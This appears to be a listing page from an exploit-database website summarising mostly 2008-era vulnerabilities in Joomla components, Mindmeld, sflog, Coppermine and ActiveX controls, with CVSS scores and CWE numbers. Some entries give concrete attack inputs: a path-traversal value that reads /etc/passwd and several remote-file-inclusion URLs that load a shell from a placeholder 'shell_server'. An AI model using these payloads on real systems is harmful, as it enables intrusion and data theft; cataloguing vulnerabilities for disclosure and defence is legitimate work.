header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Show More

Joomla SQL Injection (com_catalogshop)

An attacker can exploit a SQL injection vulnerability in the com_catalogshop component of Joomla! to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'index.php' script when 'func' is set to 'detail'. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation could result in unauthorized access to sensitive information in the back-end database.

7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name
Joomla
Platforms Tested
N/A
Affected Version
From:
1.0 beta 1 ruff n ready
To:
1.0 beta 1 ruff n ready
2008
Show More

Joomla SQL Injection (com_akogallery)

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'id' of the 'index.php' script. This can be used to extract data from the database, modify data, delete data, or even execute commands on the operating system.

7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name
AkoGallery
Platforms Tested
N/A
Affected Version
From:
2.5 beta
To:
2.5 beta
2008
Show More

Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

A vulnerability exists in Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) which allows an attacker to write arbitrary files to the system. This is due to the insecure use of the SavePkcs8File method which allows an attacker to write arbitrary files to the system.

7.5
CVSS
HIGH
Insecure Method
264
CWE
Product Name
Chilkat FTP ActiveX
Platforms Tested
Windows XP Professional SP2
Affected Version
From:
2
To:
2
2008
Show More

sflog! 0.96 remote file disclosure vulnerabilities

Sflog! 0.96 is vulnerable to remote file disclosure. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request should contain a malicious URL with the ‘blog’ and ‘permalink’ parameters set to ‘../../../../../../../../../../etc/passwd’. This will allow the attacker to view the contents of the ‘/etc/passwd’ file.

7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name
sflog
Platforms Tested
N/A
Affected Version
From:
0.96
To:
0.96
2008
Show More

Mindmeld Remote File Inclusion Vulnerabilities

Mindmeld is an enterprise-capable knowledge-sharing system written in PHP. There are multiple remote file inclusion vulnerabilities in Mindmeld version 1.2.0.10 (latest version). The vulnerable files and lines are Mindmeld-1.2.0.10/acweb/admin_index.php: line 51, Mindmeld-1.2.0.10/include/ask.inc.php: line 34, Mindmeld-1.2.0.10/include/learn.inc.php: line 38, Mindmeld-1.2.0.10/include/manage.inc.php: line 31, Mindmeld-1.2.0.10/include/mind.inc.php: line 33, Mindmeld-1.2.0.10/include/sensory.inc.php: line 70. The PoC for each of these vulnerabilities is http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php? respectively. These vulnerabilities have been disclosed to the vendor although development on this software has been discontinued.

7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name
Mindmeld
Platforms Tested
N/A
Affected Version
From:
1.2.0.10
To:
1.2.0.10
2020
Show More

MySpace Uploader Buffer Overflow Exploit

This exploit is a buffer overflow vulnerability in MySpaceUploader.ocx and Aurigma ImageUploader4.ocx. It was written by e.b. and tested on Windows XP SP2 (fully patched) English, IE6. The MySpaceUploader.ocx version is 1.0.0.4 and the Aurigma ImageUploader4.ocx version is 4.5.70.0. The exploit was developed with the help of h.d.m. and the Metasploit crew.

9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name
MySpaceUploader.ocx/Aurigma ImageUploader4.ocx
Platforms Tested
Windows XP SP2
Affected Version
From:
1.0.0.4
To:
4.5.70.0
2008
Show More

PHP Links from DeltaScripts <= 1.3

A Remote File Inclusion (RFI) vulnerability exists in PHP Links from DeltaScripts version 1.3 and earlier. The vulnerability is due to the application including files based on user-supplied input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, resulting in the execution of arbitrary code on the vulnerable system.

9.3
CVSS
HIGH
Remote File Inclusion Vulnerability
98
CWE
Product Name
PHP Links
Platforms Tested
N/A
Affected Version
From:
1.3
To:
1.3
2008
Show More

CHRONOFORMS version V2.3.5 Remote File Include Vulnerability

A vulnerability in CHRONOFORMS version V2.3.5 allows an attacker to include a remote file via the mosConfig_absolute_path parameter in the following files: /administrator/components/com_chronocontact/excelwriter/Writer.php, /administrator/components/com_chronocontact/excelwriter/PPS.php, /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php, /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php, /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php, /administrator/components/com_chronocontact/excelwriter/Writer/Format.php, and /administrator/components/com_chronocontact/excelwriter/Writer/Parser.php.

7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name
ChronoForms
Platforms Tested
N/A
Affected Version
From:
V2.3.5
To:
V2.3.5
2009
Show More

Remote Shell Command Execution in Coppermine 1.4.14

An attacker is able to execute arbitrary shell commands with the privileges of the web server process, such as user 'nobody','apache' or 'www'. This is caused by unsanitized user-submitted POST variables 'quality', 'angle' and 'clipval' in the function 'rotateImage' in 'include/imageObjectIM.class.php'.

7.5
CVSS
HIGH
Remote Shell Command Execution
N/A
CWE
Product Name
Coppermine Photo Gallery
Platforms Tested
IIS, Apache 1.3.24 onwards to the latest Apache 2, on Linux, UNIX, OSX, and Win32 systems.
Affected Version
From:
Coppermine 1.4.14
To:
Coppermine 1.4.14
2008

Recent Exploits:

RDPGuard 9.9.9 – Privilege Escalation

author
Ahmet Ümit BAYRAM
vendor
RDPGuard
severity
6.1
HIGH

YesWiki Unauthenticated Path Traversal

author
Al Baradi Joy
vendor
YesWiki
severity
7.1
HIGH

ABB Cylon Aspect 3.08.02 Stored Cross-Site Scripting Vulnerability

author
Gjoko 'LiquidWorm' Krstic
vendor
ABB Ltd.
severity
6.1
HIGH

Apache ActiveMQ 6.1.6 – Denial of Service (DOS)

author
Abdualhadi khalifa
vendor
Apache
severity
6.1
HIGH

GeoVision GV-ASManager 6.1.1.0 – CSRF

author
Giorgi Dograshvili [DRAGOWN]
vendor
GeoVision
severity
6.1
HIGH

ABB Cylon FLXeon 9.3.4 WebSocket Command Spawning Vulnerability

author
Zero Science Lab
vendor
ABB Ltd.
severity
6.1
HIGH

GestioIP 3.5.7 – Stored Cross-Site Scripting Vulnerability

author
m4xth0r (Maximiliano Belino)
vendor
GestioIP
severity
6.1
HIGH

Cacti 1.2.26 – Remote Code Execution (RCE) (Authenticated)

author
D3Ext
vendor
Cacti
severity
6.1
HIGH

Exclusive Addons for Elementor ≤ 2.6.9 – Authenticated Stored Cross-Site Scripting (XSS)

author
Al Baradi Joy
vendor
exclusiveaddons
severity
5.1
MEDIUM

Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)

author
Alex Messham
vendor
Kentico
severity
6.1
HIGH

Navigation

Suggest Exploit

Services By CQR